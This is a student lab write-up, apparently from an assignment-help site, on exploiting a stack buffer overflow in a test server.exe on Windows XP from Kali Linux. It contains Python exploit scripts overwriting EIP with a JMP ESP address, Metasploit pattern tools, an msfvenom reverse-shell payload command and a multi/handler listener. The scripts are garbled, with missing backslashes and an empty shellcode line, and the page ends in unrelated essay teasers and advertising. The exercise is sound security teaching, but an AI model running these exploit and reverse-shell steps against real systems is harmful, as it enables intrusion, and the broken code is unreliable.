For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and Windows XP and for both the machines the network configuration is set to NAT. The configuration NAT enables the private IP to be connected with the internet and enable communication. The IP address are checked for enabling communication between the machines and on the windows machine the immunity debugger is opened for running the python script and loading the server.exe and executed.
Then in the next step the kali linux is used for creating a file using the vi editor and is named as attack.py. The code given in the workshop is inserted in the file that is given below:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is pressed for passing the exception and execution of the code. A sample result is found that is given in the following screenshot where the EIP values changes to the value used by the attacker and it is also similar for the EBP value.
The ESP is used for pointing to a certain region of memory and it contains the value that is injected by the attacker.
For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and the execution is started. In the command line interface of the kali linux machine the following command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the EIP value. For the determination of the offset value of the EIP the command “./pattern_offset.rb -l 5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending on this the address for the code is determined that jumps to the ESP. The ESP is used for the representation of the pointer for a memory for the management of the control. The server.exe is restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code in the kali linux machine is modified according to the workshop and the commands is:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python” is used and exploitation is performed. For the exploitation the code msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit" is used and on the windows client the immunity debugger is closed. The modified python code is executed wit the IP address of the client for the completion of the workshop.
Cyber Security - CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India | Ethical Hacking Courses | Ethical Hacking Course In Kolkata - ISOEH. (2018). Isoeh.com. Retrieved 21 September 2018, from https://www.isoeh.com/CII-ICT-East-2017-cyber-security.html
Definitions, E., & Hope, C. (2018). What is Ethical Hacking and an Ethical Hacker?. Computerhope.com. Retrieved 21 September 2018, from https://www.computerhope.com/jargon/e/ethihack.htm
Ethical Hacking - Computing and Software Wiki. (2018). Wiki.cas.mcmaster.ca. Retrieved 21 September 2018, from https://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking
Ethical Hacking - ICT Issue. (2018). Sikandar's E-Portfolio. Retrieved 21 September 2018, from https://sikandarbttportfolio.weebly.com/ethical-hacking---ict-issue.html
Freeman, R. (2016). Ethical hacking: what is it, and why would I need it?. IT Governance Blog. Retrieved 21 September 2018, from https://www.itgovernance.co.uk/blog/ethical-hacking-what-is-it-and-why-would-i-need-it/
What is ethical hacker? - Definition from WhatIs.com. (2018). SearchSecurity. Retrieved 21 September 2018, from https://searchsecurity.techtarget.com/definition/ethical-hacker
To export a reference to this article please select a referencing stye below:
My Assignment Help. (2021). Ethical Hacking And Defence For Immunity Debugger. Retrieved from https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
"Ethical Hacking And Defence For Immunity Debugger." My Assignment Help, 2021, https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
My Assignment Help (2021) Ethical Hacking And Defence For Immunity Debugger [Online]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html
[Accessed 18 April 2021].
My Assignment Help. 'Ethical Hacking And Defence For Immunity Debugger' (My Assignment Help, 2021) <https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html> accessed 18 April 2021.
My Assignment Help. Ethical Hacking And Defence For Immunity Debugger [Internet]. My Assignment Help. 2021 [cited 18 April 2021]. Available from: https://myassignmenthelp.com/free-samples/csi3508-ethical-hacking-and-defence/windows-client.html.
Obtain plagiarism-free assignment whenever you opt for our assignment help service in Aus. We have a strict zero-plagiarism policy that our expert writers steadfastly follow when they work on your academic papers. They will find the most pertinent resources for your task and cite them appropriately. They will maintain complete originality while including information in your paper. This way, they WILL uphold your academic integrity at all cost.
Answer Evaluating the financial management strategies of the top four Australian banks i.e. Commonwealth, Westpac, ANZ, and NAB Research Topic Evaluating the financial management strategies of the top four Australian banks i.e. Commonwealth, Westpac, ANZ, and NAB Introduction This report will discuss several components such as research objectives, research motivation, and conceptual information about the research concepts, and research di...
Read MoreAnswer Introduction: Tasmanian Mountain Waters is an Australian company, based in Tasmania. The company exclusively sells bottled mineral water across Australia and plans to extend its business globally to increase its international presence. The companyaims to retain the pureness and natural quality of the bottled water which is collected from remote springs of freshwater in Tasmania. Tasmania with its plentiful supply of freshwater that is ...
Read MoreAnswer: Souq is an e-commerce platform that is owned by Amazon. It is one of the largest e-commerce platforms in arab world. In this report, I have considered myself as a global manager of marketing department. The business of souq is localized in Saudi Arabia, united arab and Egypt. It was suggested that business need to widespread in other countries rather than just in gulf region. This report covers the strategies through which Souq c...
Read MoreAnswer Introduction The principles of Corporations Act put the obligation on the company directors to release their duties, responsibilities and powers with the aim to act for the business interest of the companies. The underlying fact is that the directors need to discharge their duties and powers for maximizing the organizational wealth for the best interest of their shareholders (Tricker and Tricker 2015). However, the occurrence of some r...
Read MoreAnswer Overview of Red Rooster Red Rooster was founded in 1972 is a chain of Australian fast food restaurant that specializes in serving roast chicken. The first Red Rooster store was opened in 1972, in Perth suburb of Kelmscott, Western Australia (Lasek, Cercone and Saunders, 2016). There possess a wide range of products including half roasts, whole roasts, burgers, wraps, salads, desserts, beverages, promotions formerly including Cheese and...
Read MoreJust share requirement and get customized Solution.
Orders
Overall Rating
Experts
Our writers make sure that all orders are submitted, prior to the deadline.
Using reliable plagiarism detection software, Turnitin.com.We only provide customized 100 percent original papers.
Feel free to contact our assignment writing services any time via phone, email or live chat. If you are unable to calculate word count online, ask our customer executives.
Our writers can provide you professional writing assistance on any subject at any level.
Our best price guarantee ensures that the features we offer cannot be matched by any of the competitors.
Get all your documents checked for plagiarism or duplicacy with us.
Get different kinds of essays typed in minutes with clicks.
Calculate your semester grades and cumulative GPa with our GPA Calculator.
Balance any chemical equation in minutes just by entering the formula.
Calculate the number of words and number of pages of all your academic documents.
Our Mission Client Satisfaction
I got a very high mark and I am satisfied with the service provided this time. Thank you!
Australia
It was great. The paper got the details and the information I needed. It was good effort.
Australia
It was good. The assignment provided good details and I got the information I needed.
Australia
GOOD! The tutor is professional, responsible and patient. The reply was timely...................
Australia